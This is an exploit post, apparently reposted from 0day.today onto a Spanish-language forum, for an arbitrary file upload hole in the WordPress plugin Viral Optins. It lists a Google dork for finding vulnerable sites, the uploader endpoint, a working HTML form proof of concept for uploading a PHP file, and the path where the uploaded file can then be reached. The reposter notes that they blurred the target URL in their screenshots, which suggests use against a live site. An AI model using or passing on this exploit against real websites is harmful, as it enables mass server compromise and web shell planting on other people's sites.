(https://puu.sh/wsvpm/2ce3c3563b.png)
(https://puu.sh/wsvt3/3bc1572bef.png)
Aplicando Poc:
(https://puu.sh/wsvwx/6844370f4e.png)
(https://puu.sh/wsvyq/51e92da8fa.png)
(http://i.imgur.com/aRkw0wr.png)
(http://i.imgur.com/SZeZWLq.png)
# Exploit Title: WordPress Plugins Viral Optins - Arbitrary File Upload
# Exploit Author: x0id
# Date: 13 June 2017
# Tested on: Windows 7
1) Search target with Google Dorking
inurl:/wp-content/plugins/viral-optins/
2) Exploit the websites
https://localhost/wp-content/plugins/viral-optins/api/uploader/file-uploader.php
Vulnerability? Page Blank!
3) Proof of concept (PoC)
<form method="POST" action="https://localhost/wp-content/plugins/viral-optins/api/uploader/file-uploader.php" enctype="multipart/form-data">
<input type="file" name="Filedata" />
<button>Upload!</button><br/>
</form>
4) Result file access.
https://localhost/wp-content/uploads/YYYY/MM/your-file.php
Indonesian h4x0r.
# 0day.today [2017-06-23] #
Bueno intente cubrir la URL en todas las imagenes :) :P
Saludos..!